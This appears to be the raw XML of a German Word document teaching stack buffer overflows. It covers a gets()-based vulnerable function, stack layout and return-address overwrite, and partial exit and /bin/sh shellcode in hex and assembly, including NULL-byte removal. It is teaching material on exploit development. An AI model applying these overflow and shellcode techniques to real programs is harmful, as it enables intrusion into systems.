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A40" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="Titel"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Overlow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>?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– temporärer Platz im Speicher der zur Speicherung von Daten genutzt wird</w:t>
      </w:r>
    </w:p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Overflow – Passiert, wenn Daten in den </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> geschrieben werden, die Größer sind als der </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> und aufgrund nicht ausreichend geprüfter Grenzen des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, und angrenzende Speicherbereiche überschreiben</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:r>
        <w:t>Eine einfache angreifbare Funktion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC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A3695E" wp14:editId="140DFCCA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>225620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>85837</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4000500" cy="1138443"/>
                <wp:effectExtent l="0" t="0" r="19050" b="24130"/>
                <wp:wrapNone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11384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9EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
                            <w:pPr>
                              <w:pStyle w:val="KeinLeerraum"/>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>GetInpu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]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ge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pu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17.75pt;margin-top:6.75pt;width:315pt;height:89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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
                <v:fill opacity="52428f"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
                      <w:pPr>
                        <w:pStyle w:val="KeinLeerraum"/>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>GetInput</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>()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{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]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ge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pu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roofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() prüft nicht ob die Größe der Eingabe &gt; als die Größe des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Remember</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Layout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRPr="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC"/>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:r>
        <w:object w:dxaOrig="6765" w:dyaOrig="8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9pt;height:287.2pt" o:ole="">
            <v:imagedata r:id="rId9" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1411805176" r:id="rId10"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Layout unseres angreifbaren Programms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC"/>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:r>
        <w:object w:dxaOrig="6028" w:dyaOrig="9345">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:301.45pt;height:467.6pt" o:ole="">
            <v:imagedata r:id="rId11" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1411805177" r:id="rId12"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:r>
        <w:t>Beobachtungen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2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>12 Byte müssen aufgefüllt werden um zu RET zu kommen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Dann müssen die nächsten 4 Byte gefüllt werden für den neuen Wert von RET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Wenn die Funktion zu Ende ist, wird der neue RET Wert genutzt um zu entscheiden was als nächstes ausgeführt wird</w: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Pr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC"/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Wenn wir die Kontrolle über die Return Adresse haben, können wir ihn auf „unseren ausführbaren </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>“ zeigen lassen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Payload ist Maschinencode welcher direkt von der CPU ausgeführt wird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Dieser Payload wird </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> genannt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Standardmäßig wird es genutzt um eine Shell zu öffnen, daher der Name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A52A11" w:rsidRDefault="00A52A11" w:rsidP="00A52A11">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Code in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> umwandeln</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A52A11" w:rsidRDefault="00A52A11" w:rsidP="00A52A11"/>
    <w:p w:rsidR="00A52A11" w:rsidRDefault="00A52A11" w:rsidP="00A52A11">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Code in C schreiben und ausführbare Datei erstell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Disassemblen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> der ausführbaren Datei und Assembler äquivalent betracht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Unnötigen Code entfern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Code in Assembler neu schreiben</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A52A11" w:rsidRPr="008B1A26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Objdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> benutzen, um den </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> herauszufinden:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A52A11">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>objdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A52A11">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> –d &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A52A11">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>assemblerdatei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A52A11">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRPr="00A52A11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A7895A" wp14:editId="714D35D5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>225425</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>112395</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1488440" cy="1366520"/>
                <wp:effectExtent l="0" t="0" r="16510" b="24130"/>
                <wp:wrapNone/>
                <wp:docPr id="2" name="Textfel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440" cy="13665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" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:8.85pt;width:117.2pt;height:107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A171B33" wp14:editId="237B3FE2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2054420</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>112506</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1488880" cy="1367043"/>
                <wp:effectExtent l="0" t="0" r="16510" b="24130"/>
                <wp:wrapNone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880" cy="1367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 xml:space="preserve"> :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2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3" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:161.75pt;margin-top:8.85pt;width:117.25pt;height:10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 xml:space="preserve"> :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2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8B1A26" w:rsidRDefault="008B1A26" w:rsidP="00FC49EC"/>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="00FC49EC"/>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ExitShellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ausführ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4E7819" wp14:editId="3F623D5C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>225620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>103617</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3889180" cy="2510043"/>
                <wp:effectExtent l="0" t="0" r="16510" b="24130"/>
                <wp:wrapNone/>
                <wp:docPr id="4" name="Textfeld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9180" cy="2510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bb</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>\x14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xb8\x01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+2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 xml:space="preserve">;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4" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:8.15pt;width:306.25pt;height:197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bb</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>\x14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xb8\x01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+2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 xml:space="preserve">;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Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verschiebt nach dem Start des Programms, die Speicheradresse des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcodes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in die Return Adresse, und überschreibt die eigentliche Return Adresse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26"/>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Analyse mit GDB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36D8C9F0" wp14:editId="35C7DC06">
            <wp:extent cx="3619500" cy="175260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C73419">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C73419">
        <w:instrText xml:space="preserve"> SEQ Abbildung \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00C73419">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00FB1D24">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C73419">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Disassemble</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> der Mainfunktion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F5091DE" wp14:editId="60F8DA9F">
            <wp:extent cx="5746159" cy="4497105"/>
            <wp:effectExtent l="0" t="0" r="6985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7" cy="451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C73419">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C73419">
        <w:instrText xml:space="preserve"> SEQ Abbildung \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00C73419">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00FB1D24">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00C73419">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - ESP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>register</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sowie Code an der aktuellen RET Adresse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRP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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45E7F1F5" wp14:editId="6E3A28EE">
            <wp:extent cx="5667375" cy="952500"/>
            <wp:effectExtent l="0" t="0" r="9525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C73419">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C73419">
        <w:instrText xml:space="preserve"> SEQ Abbildung \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00C73419">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00FB1D24">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00C73419">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - ESP nach Überschreibung des RET Wertes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26"/>
    <w:p w:rsidR="008B1A26" w:rsidRPr="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26"/>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48412600" wp14:editId="065BAB70">
            <wp:extent cx="5695950" cy="200977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C73419">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C73419">
        <w:instrText xml:space="preserve"> SEQ Abbildung \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00C73419">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00FB1D24">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00C73419">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Disassemble</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> der Aktuellen RET Adresse - zeigt auf unseren </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A2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B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zum Öffnen einer Shell schreib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CCAE93" wp14:editId="1851EA70">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2396064</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>130936</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="685800" cy="2396490"/>
                <wp:effectExtent l="0" t="0" r="19050" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="10" name="Geschweifte Klammer recht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396490"/>
                        </a:xfrm>
                        <a:prstGeom prst="rightBrace">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val 85895"/>
                            <a:gd name="adj2" fmla="val 50839"/>
                          </a:avLst>
                        </a:prstGeom>
                        <a:ln w="254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Geschweifte Klammer rechts 10" o:spid="_x0000_s1026" type="#_x0000_t88" style="position:absolute;margin-left:188.65pt;margin-top:10.3pt;width:54pt;height:188.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" adj="5309,10981" strokecolor="black [3213]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9B8489" wp14:editId="7E3837EF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>225620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>130936</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1946080" cy="2396999"/>
                <wp:effectExtent l="0" t="0" r="16510" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="9" name="Textfel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3969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2]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=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1]=NULL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,</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>args,NULL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9" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:10.3pt;width:153.25pt;height:18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2]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=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1]=NULL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,</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>args,NULL</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>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C6C68E" wp14:editId="5DBC23CE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3076575</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>247538</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="343368"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone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4336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>
                            <w:r>
                              <w:t>Code zum Öffnen einer She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1" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:242.25pt;margin-top:19.5pt;width:2in;height:27.0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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26">
                      <w:r>
                        <w:t>Code zum Öffnen einer Shell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berschrift3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stack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betrachten</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26"/>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:r>
        <w:object w:dxaOrig="8012" w:dyaOrig="9544">
          <v:shape id="_x0000_i1027" type="#_x0000_t75" style="width:356.05pt;height:423.3pt" o:ole="">
            <v:imagedata r:id="rId17" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1027" DrawAspect="Content" ObjectID="_1411805178" r:id="rId18"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Assembler </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Equivalent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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B67719" wp14:editId="1403A4B8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>225620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>157606</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3200400" cy="5140199"/>
                <wp:effectExtent l="0" t="0" r="19050" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="12" name="Textfel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51401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data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asciz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1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2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outine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Null2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Exit Routine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Exit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2" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:12.4pt;width:252pt;height:404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data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asciz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1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2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outine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ddrToBash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Null2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Exit Routine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Exit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985FDC">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Probleme mit diesem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00985FDC" w:rsidRDefault="00985FDC" w:rsidP="00985FDC"/>
    <w:p w:rsidR="00985FDC" w:rsidRDefault="00985FDC" w:rsidP="00985FDC">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Der </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> beinhaltet NULL=‘0‘, diese können nicht in ein </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>character</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> eingefügt werden, da sie dort das Ende des Strings bedeuten würde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 w:rsidRPr="00985FDC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>NULL Anweisungen entfernen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00985FDC" w:rsidRPr="00985FDC" w:rsidRDefault="00985FDC" w:rsidP="00985FDC">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00985FDC">
        <w:t>Nutzung von fest programmierten Adressen, dadurch funktioniert es nicht auf allen Rechner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>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Relative Adressen verwenden</w:t>
      </w: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sectPr w:rsidR="00985FDC">
          <w:headerReference w:type="default" r:id="rId19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985FDC" w:rsidRDefault="00985FDC" w:rsidP="00985FDC">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Benutzbaren </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode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erstellen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00660EE9" w:rsidRDefault="00660EE9" w:rsidP="00660EE9"/>
    <w:p w:rsidR="00660EE9" w:rsidRDefault="00660EE9" w:rsidP="00660EE9">
      <w:r>
        <w:object w:dxaOrig="10655" w:dyaOrig="7326">
          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:532.5pt;height:366.35pt" o:ole="">
            <v:imagedata r:id="rId20" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1028" DrawAspect="Content" ObjectID="_1411805179" r:id="rId21"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00660EE9" w:rsidRDefault="00660EE9" w:rsidP="00660EE9">
      <w:pPr>
        <w:sectPr w:rsidR="00660EE9" w:rsidSect="00985FD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660EE9" w:rsidRDefault="00660EE9" w:rsidP="00660EE9">
      <w:pPr>
        <w:pStyle w:val="berschrift4"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> nach der Modifizierung</w:t>
      </w:r>
    </w:p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1DD080" wp14:editId="2DD4A4DA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>225620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>287201</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4686300" cy="4459424"/>
                <wp:effectExtent l="0" t="0" r="19050" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="13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445942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jm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pop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xor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%al, 0x9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$11, %al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call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ShellVariables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.</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>ascii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ABBBBCCCC</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>"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3" o:spid="_x0000_s1033" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:17.75pt;margin-top:22.6pt;width:369pt;height:351.1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jmp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yCallStatemen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pop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xor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%al, 0x9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$11, %al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yCallStatemen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call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ShellVariables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.</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>ascii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ABBBBCCCC</w:t>
                      </w:r>
